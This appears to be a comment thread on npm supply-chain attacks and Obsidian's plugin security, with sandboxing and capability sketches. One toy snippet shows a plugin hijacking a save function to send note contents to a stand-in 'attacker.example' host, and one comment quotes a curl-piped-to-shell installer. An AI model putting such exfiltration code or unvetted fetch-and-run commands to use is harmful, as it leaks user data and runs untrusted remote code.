The problem with supply chain attacks is specific to npm, not to JS itself. npm as an organization needs to take more responsibility for the recent attacks and essentially force everyone to use stricter security controls when publishing packages.
It runs on a majority of computers and basically all phones. There will be many security issues that get discovered by virtue of these facts.
What makes you think that "native" apps are any more secure?
It’s maybe a nit-pick, since most JS is run sandboxed, so it’s sort of equivalent. But it was explicitly what GP asked for. Would it be more accurate to say Electron is secure, not JS?
But as a developer, this post is nonsense and extremely predictable [1]. We can expect countless others like it explaining how their use of these broken tools is different, so just don't worry about it!
By their own linked Credits page there are 20 dependencies. Let's take one of those, electron, which itself has 3 dependencies according to npm. Picking one of those, @electron/get, it has 7 dependencies. One of those dependencies, got, has 11 dependencies; one of those, cacheable-request, has 7 dependencies, and so on.
Now go back and pick another direct dependency of Obsidian and work your way down the dependency tree again. Does the Obsidian team review all these, and who owns them? Do they trust each layer of the chain to pick up issues before it gets to them? Any one of these dependencies can be compromised. This is what a supply chain attack means: you only have to quietly slip something into any one of these dependencies to have access to countless users' critical data.
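If you want to see the blast radius yourself, here's a rough sketch that walks the transitive tree the same way (it assumes npm's hoisted, flat node_modules layout; the script itself is just illustrative, not a real resolver):

    // Prints every transitive dependency declared in package.json files under
    // node_modules. Assumes a flat (hoisted) layout; nested layouts would need
    // a proper resolver.
    import { readFileSync, existsSync } from "node:fs";
    import { join } from "node:path";

    function walk(pkgDir: string, seen = new Set<string>()): void {
      const manifest = JSON.parse(readFileSync(join(pkgDir, "package.json"), "utf8"));
      for (const dep of Object.keys(manifest.dependencies ?? {})) {
        if (seen.has(dep)) continue;
        seen.add(dep);
        console.log(dep); // each of these is code someone else publishes and controls
        const depDir = join("node_modules", dep);
        if (existsSync(depDir)) walk(depDir, seen);
      }
    }

    walk(".");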
[1] https://drewdevault.com/2025/09/17/2025-09-17-An-impossible-...
Obsidian has a truly terrible security model for plugins. As I realized while building my own, Obsidian plugins have full, unrestricted access to all files in the vault.
Obsidian could've instead opted to be more 'batteries-included', at the cost of more development effort, but instead leaves this to the community, which in turn increases the attack surface significantly.
Or it could have a browser-extension-like manifest that declares all permissions used by the plugin, where attempting to access a permission that hasn't been granted gets blocked.
Both of these approaches would've led to more real security to end users than "we have few third party dependencies".
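As a rough illustration of what that could look like (the manifest fields and permission names here are hypothetical, not anything Obsidian actually supports today):

    // Hypothetical plugin manifest with declared permissions, in the spirit of
    // browser extension manifests. None of these fields exist in Obsidian.
    interface PluginManifest {
      id: string;
      permissions: Array<"read-vault" | "write-vault" | "network" | "clipboard">;
    }

    const manifest: PluginManifest = {
      id: "better-tables",
      permissions: ["read-vault"], // anything not listed here would be denied
    };

    // Host-side check before handing the plugin the corresponding capability:
    function assertPermission(
      m: PluginManifest,
      p: PluginManifest["permissions"][number]
    ): void {
      if (!m.permissions.includes(p)) {
        throw new Error(`plugin ${m.id} has not been granted "${p}"`);
      }
    }

    assertPermission(manifest, "network"); // throws: the plugin never declared it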
And how exactly can you solve that?
I don't want to press 'allow access' for every file a plugin touches.
IMO they should do something like the AUR on Arch Linux and have a community-managed plugin repo and then a smaller, more vetted one. That would help with the plugin review time too.
If they wanted to, one would guess that browser-ish local apps based on stuff like Electron/node-webkit could probably figure out some way to limit extension permissions more granularly.
There is no reason for pdf.js to ever access anything other than the files you wish to export. The Export to PDF process could spawn a containerized subprocess with zero filesystem or network access and constrained CPU and memory limits. Files could be sent to the export process over stdin, and the resulting PDF could be streamed back over stdout, with stderr used for logging.
There are lots of plugin systems that work this way. I wish it were commodified and universally available. AFAIK there's very little cross-platform tooling to help you solve this problem easily, and that's a pity.
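A minimal sketch of the shape of that in Node (the render-pdf.js worker and the wiring are hypothetical; spawn() only gives you the pipe-based interface, not the container, seccomp profile, or CPU/memory limits you'd still need for real isolation):

    // Run an untrusted export step in a separate process, talking to it only
    // over pipes. stdin = input file, stdout = resulting PDF, stderr = logs.
    import { spawn } from "node:child_process";
    import { readFile, writeFile } from "node:fs/promises";

    async function exportToPdf(notePath: string, outPath: string): Promise<void> {
      const note = await readFile(notePath);

      // Hypothetical worker: reads Markdown on stdin, writes PDF bytes to stdout.
      const worker = spawn(process.execPath, ["render-pdf.js"]);

      const chunks: Buffer[] = [];
      worker.stdout.on("data", (c: Buffer) => chunks.push(c));
      worker.stderr.on("data", (c: Buffer) => console.error(`[export] ${c}`));

      worker.stdin.write(note);
      worker.stdin.end();

      const exitCode = await new Promise<number>((resolve) =>
        worker.on("close", (code) => resolve(code ?? 1))
      );
      if (exitCode !== 0) throw new Error(`export worker failed (${exitCode})`);

      await writeFile(outPath, Buffer.concat(chunks));
    }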
FWIW, MacOS isn't any better or worse for security than any other desktop OS tbh....
I mean, MacOS just had its "UAC" rollout not that long ago... and not sure about you, but I've encountered many times where someone had to hang up a Zoom or browser call because they updated the app or OS and had to re-grant screenshare permissions or something. So, not that different. (Pre-"UAC" versions of MacOS didn't do any sandboxing when it came to user files / device access.)
I’d love to try it, but speaking of security, this was the first thing I saw:
sh <(curl https://create.tauri.app/sh)
I would say VSCode has no excuse. It's based on a browser which does have capabilities to limit extensions. Huge miss on their part, and one that I wish drew more ire.
It's a great way to keep lifecycle costs down and devops QoL up, especially for smaller shops.
*Insert favorite distro here that backports security fixes to stable package versions for a long period of time.
Sneak in a malicious browser extension that breaks the permissions sandbox, and you have hundreds of thousands to millions of users as an attack surface.
Make a malicious VSCode/IDE extension and maybe you hit some hundreds or thousands of devs, a couple of smaller companies, and probably can get on some infosec blogs...
It's not a problem on PC, but an Obsidian vault with thousands of notes can have a laggy startup on mobile, even if you disable plugins.
Users sidestep this issue with quick-capture plugins and apps, but I wish there was a native stripped-down version of Obsidian.
Code with publicly known weaknesses poses far more danger than code with unknown weaknesses.
It's like telling sysadmins to not waste time installing security patches because there are likely still vulnerabilities in the application. Great way to get n-day'd into a ransomware payment.
I'd also be forced to ask... what exactly are you doing with a markdown note-taking application such that performance is a legitimate concern?
But, I mean, maybe you're reading this in a Lynx session on your ThinkPad 701C.
While we're on the topic: what's your default markdown handler on Windows?
Any two Turing-complete programming languages are equally secure, no?
Surely the security can only ever come from whatever compiles/interprets it? You can run JavaScript on a piece of paper.
Maybe, just maybe, don't give full-throated advice on reducing risk in the supply chain.
If engineers can't even manage their own security, why are we expecting users to do so?
What a horribly disingenuous statement, for a product that isn't remotely usable without 3rd-party plugins. The "Obsidian" product would be more aptly named "Mass Data Exfiltration Facilitator Pro".
It is possible to make your same point without histrionic excess.
Conversely, barring a bug in the runtime or compiler, higher-level languages don't enable those kinds of shenanigans.
See, for example, the Heartbleed bug, where OpenSSL would read memory it didn't own when given a carefully malformed request.
If you use Wayland and it works for you, that's great, but it's not my experience.
This latest attack hit CrowdStrike as well. Imagine they had gotten inside Huntress, which has been open about how much the access it's given could be abused: https://news.ycombinator.com/item?id=45183589
Security folks and companies think they are important. The C-suite sees them as a scapegoat WHEN the shit hits the fan, and most end users feel the same about security as they do about taking off their shoes at the airport (what is this nonsense for?), and they mostly aren't wrong.
It's not that engineers can't take care of their own security. It's that we have made it a fight with an octopus rather than something that is seamless and second nature. Furthermore, security and privacy go hand in hand... Teaching users that is not to the benefit of a large portion of our industry.
I dunno. My computer has at least one hardware backdoor that I know of, and I just can't get hardware without an equivalent exploit.
My OS is developed with a set of tools known to make code review about as hard as possible. It provides the bare minimum of application isolation, and it's two orders of magnitude larger than any single person could read in their lifetime. It's also the usable OS with the best security guarantees out there; everything else is much worse or useless.
A browser is almost a complete new layer above the OS. And it's 10 times larger. It's also written in a way that famously makes review impossible.
And then there are the applications, which is what everybody is focusing on today. Keeping them secure is close to useless if one doesn't fix all of the above.
EDIT to add: Of course, reaching a state where the whole graph is free of CVEs is a fleeting state of affairs. Staying reasonably up-to-date and using only scanned dependencies is an ongoing process that takes more effort and attention to detail than many projects are willing or able to apply; but it is possible.
Language design actually has a lot of impact on security, because it defines what primitives you have available for interacting with the system. Do you have an arbitrary syscall primitive? Then the language is not going to help you write secure software. Is your only ability to interact with the system via capability objects that must be provided externally to authorize your access? Then you're probably using a language that put a lot of thought into security and will help out quite a lot.
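A toy sketch of the capability style (hypothetical API, written in TypeScript rather than in a language that actually enforces this; a real capability-secure language makes it impossible to reach the filesystem any other way):

    // The plugin never imports fs itself; it can only touch what it is handed.
    import { promises as fs } from "node:fs";

    // The capability: a handle scoped to a single directory.
    interface DirCapability {
      read(name: string): Promise<string>;
    }

    function makeDirCapability(root: string): DirCapability {
      return {
        async read(name: string): Promise<string> {
          if (name.includes("..") || name.includes("/")) {
            throw new Error("path escapes the granted directory");
          }
          return fs.readFile(`${root}/${name}`, "utf8");
        },
      };
    }

    // "Plugin" code: no ambient authority, only the capability it receives.
    async function plugin(vault: DirCapability): Promise<void> {
      console.log(await vault.read("daily-note.md"));
    }

    plugin(makeDirCapability("/home/me/vault")).catch(console.error); // host decides what to grant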
Tauri is trustable (for some loose definition), and the pipe-to-shell is just a well-known happy path.
All that to say it's a low value smell test.
Also, I'm in the camp that would rather git clone and then docker up. My understanding is it gives me a little more sandboxing.
- All your data is just plain files on your file system. Automation and interop are great, including with tools like Claude Code.
- It’s local-first, so performance is good.
- It’s extensible. Write extensions in HTML, CSS, and JS.
- It’s free.
- Syncing files is straightforward. Use git, Syncthing, Google Drive, or pay for their cheap sync service which is quite good.
- Product development is thoughtful and well done.
- They’re explicitly not trying to lock you in or own your data. They define open specs and build on them when Markdown doesn’t cut it.
Things you might not like:
- Their collaboration story isn’t great yet. No collaborative editing.
- It’s an Electron app.
You can install the Obsidian Flatpak and lock it down with Flatseal.
(IIUC, we actually were the first to get a certain certification for cloud deployment, maybe because we had a good handle on this and other factors.)
From the language-specific network package manager, I pulled the small number of third-party packages we used into the filesystem tree of the system's repo, and audited each new version. And I disabled the network package manager in the development and deployment environments, to make it much harder for people to add dependencies accidentally.
Dependencies outside this were either from the Linux distro (nice, because well-managed security updates), or go in the `vendor` or `ots` (off-the-shelf) trees of the repo (and are monitored for security updates).
Though when I look at some of the Python, JS, or Rust dependency explosions I sometimes see -- all dependent on being hooked up to the language's network package manager, with many people adding these cavalierly -- it becomes a much harder problem.
I understand that not updating your dependencies when new patches are released reduces the chance of accidentally installing malware, but aren’t patches regularly released in order to improve security? Wouldn’t it generally be considered unwise to not install new patches?
Unless something has changed, it's worse than that. Plugins have unrestricted access to any file on your machine.
When I brought this up in discord a while back they brushed it aside.
pnpm has a setting that lets you require a package to be at least X minutes old before it will install it. I would wait at least 24 hours just to be safe.
One thing that makes our offering unique is the ability to self-host your Relay Server so that your docs are completely private (we can't read them). At the same time you can use our global identity system / control plane to collaborate with anyone in the world.
We have pretty solid growth, a healthy paid consumer base (a lot of students and D&D/TTRPG), and starting to get more traction with businesses and enterprise.
[0] https://relay.md
I know it is not very different compared to Python or projects in any other language. But I don't feel that I can trust the node/JS community at this point.
But I haven't heard anyone talk like that in quite some time (unless it's me parroting them). Which is quite unfortunate.
I think for example if someone from the old guard of Blizzard were to write a book or at least a novella that described how the plugin system for World of Warcraft functioned, particularly during the first ten years, where it broke, how they hardened it over time, and how the process worked of backporting features from plugins into the core library...
I think that would be a substantial net benefit to the greater software community.
Far too many ecosystems make ham-fisted, half-assed, hare-brained plugin systems. And the vast majority can be consistently described by at least two of the three.
Nobody has time to read source code, but there are many tools and services that will give you brief summaries of release notes. npm audit lists security vulnerabilities in your package versions, for example.
I do adopt the strategy of not updating unless required, as updates are not only an attack vector, but also an extremely common source of bugs that I'd prefer to avoid.
But importantly I stay in the loop about what exploits I'm vulnerable to. Packages are popping up with vulnerabilities constantly, but if it's a ReDoS vulnerability in part of the package I definitely don't use or pass user input to? I'm happy to leave that alone with a notice. If it's something I'm worried another package might use unsafely, with knowledge of the vulnerability I can decide how important it is, and if I need to update immediately, or if I can (preferably) wait some time for the patch to cook in the wild.
That is the important thing to remember about security in this context: it is an active, continuous, process. It's something that needs to be tuned to the risk tolerance and risk appetite of your organisation, rather than a blanket "never update" or "always update" - for a well-formed security stance, one needs more information than that.
I get the intent, but I’m not sure this really buys much. If a package is compromised, the whole thing is already untrustworthy and skipping postinstall doesn’t suddenly make the rest of the code safe. If it isn’t compromised, then you risk breaking legitimate installation steps.
From a security perspective, it feels like an odd tradeoff. I don’t have hard data, but I’d wager we see far more vulnerabilities patched through regular updates than actual supply-chain compromises. Delaying or blocking updates in general tends to increase your exposure rather than reduce it.
It's pretty much the opposite. A lot of modding communities' security model is literally just to "trust the community."
Example: https://skylines.paradoxwikis.com/Modding_API
> The code in Mods for Cities: Skylines is not executed in a sandbox.
> While we trust the gaming community to know how to behave and not upload malicious mods that will intentionally cause damage to users, what is uploaded on the Workshop cannot be controlled.
> Like with any files acquired from the internet, caution is recommended when something looks very suspicious.
You could do it with namespaces.
I think Node (or whatever JS runtime or package manager) could allow for namespaced containment of packages with simple, modern Linux things.
The realms proposal was a step towards that at one time.
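For the in-process half of that, something like node:vm gives a flavor of it today, with the big caveat that vm is explicitly not a security boundary; real containment still needs the OS-level namespaces mentioned above. The plugin source here is made up:

    // Run "plugin" code in a separate context that only sees what we hand it:
    // no require, no process, no fs. Illustrative only; node:vm is not a
    // security boundary.
    import * as vm from "node:vm";

    const pluginSource = `exports.render = (text) => text.toUpperCase();`;

    const sandbox = { exports: {} as Record<string, unknown> };
    vm.createContext(sandbox);
    vm.runInContext(pluginSource, sandbox, { timeout: 100 });

    const render = sandbox.exports.render as (s: string) => string;
    console.log(render("hello from the host")); // HELLO FROM THE HOST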
Let's fix private key leakage and supply chain issues before worrying about C++ haxxors p0wning your machines.
The derivatives are obviously completely separate from Arch and thus are not the responsibility of Arch maintainers.
The lessons from all fields seem to be relearnt again and again in new fields :-)
The Emily language (locked-down subset of OCaml) was also interesting for actively removing parts of the standard library to get rid of the escape hatches that would enable bypassing the controls.
It might be slightly sped up by reading up on theory and past experiences of others.
I am around mid life and I see how I can tell people stuff, I can point people to resources but they still won’t learn until they hit the problem themselves and put their mind into figuring it out.
It’s still the same problem, relying on the community and trusted popular plugin developers to maintain their own security effectively.
This isn't trivial to organise, though, since semver by itself doesn't denote whether a patch is security-related or not. Of course, you can always review the release notes, but this is time-consuming and doesn't scale well when a product grows either in size of code base or community support.
This is where SAST (e.g., Semgrep or Snyk; there are many more, but these are the two I've used the most, in no particular order) and supply chain scans fall naturally into place, but they're prohibitively expensive.
There is a lot of open source tooling out there that can achieve the same, of course.
I've found that overhead/toil climbs considerably with the number of open source tools you commit to for building a security baseline. Unfortunately, this realistically means that at most companies, where time is scarcer than money, more money shifts into closed source products like those I listed rather than into those run by open source products/companies.
There are so many options, from so many different security perspectives, that analysis paralysis is a real issue.
To be fair, a plugin system built on JS, with all plugins interacting in the same JS context as the main app, has some big risks. Any plugin can change definitions and variables in the global scope, with some restrictions. But any language where you execute untrusted code in the same context/memory/etc. as trusted code has risks. The only solution is sandboxing plugins.
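A toy example of what "same context" means in practice (the host object, the plugin code, and the exfil URL are all made up):

    // The host and the plugin share one JS context, so the plugin can wrap or
    // replace anything reachable from it. Illustrative only.
    const host = {
      saveNote(path: string, body: string): void {
        // ...write to the vault...
      },
    };

    // "Plugin" code loaded into the same context:
    const realSave = host.saveNote.bind(host);
    host.saveNote = (path: string, body: string): void => {
      // hypothetical exfiltration endpoint; nothing in the runtime stops this
      void fetch("https://attacker.example/exfil", { method: "POST", body });
      realSave(path, body);
    };

    host.saveNote("daily.md", "secret plans"); // now also sends the note elsewhere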
And in general, it will use fewer hardware resources than the usual Electron stuff.
yay or paru (or other AUR helpers, AFAIK) are not in the repos. To install them one needs to know how to use the AUR in the first place. If you are technical enough to do that, you should know about the security risks, since almost all tutorials for the AUR come with security warnings. It's also inconvenient enough that most people won't bother.
In Obsidian, plugins can seem central to the experience, so users might not think much of installing them; in Arch, the AUR is very much a non-essential component. At least that's how I understand it.
While somewhat true, we are talking about a user who has installed Arch on their machine. If a user wanted to not bother with installation details, they would've installed Ubuntu.
I just decided on Thursday after years of covering my ears and eyes from my obsidian-obsessed friends and coworkers that the tool just didn’t make sense to me, and I felt like I’d be in plugin purgatory on my computer for eternity.
I’ve ended up going with Reflect, after ~forever using Apple Notes primarily. So far so good, but I genuinely felt for so long that I was supposed to love Obsidian because that’s the trope; it appears that’s changing.
It's literally at least 100 times more expensive than Dropbox/OneDrive/Google Drive/iCloud sync.
With all of the latest in automated scanning and whatnot, this is more or less a moot point. You'll know when a package is vulnerable, and the alarm bells are loud and unambiguous. I really agree, and have always pushed the point, that version ranges are the worst things you can have if you care about supply chain attacks.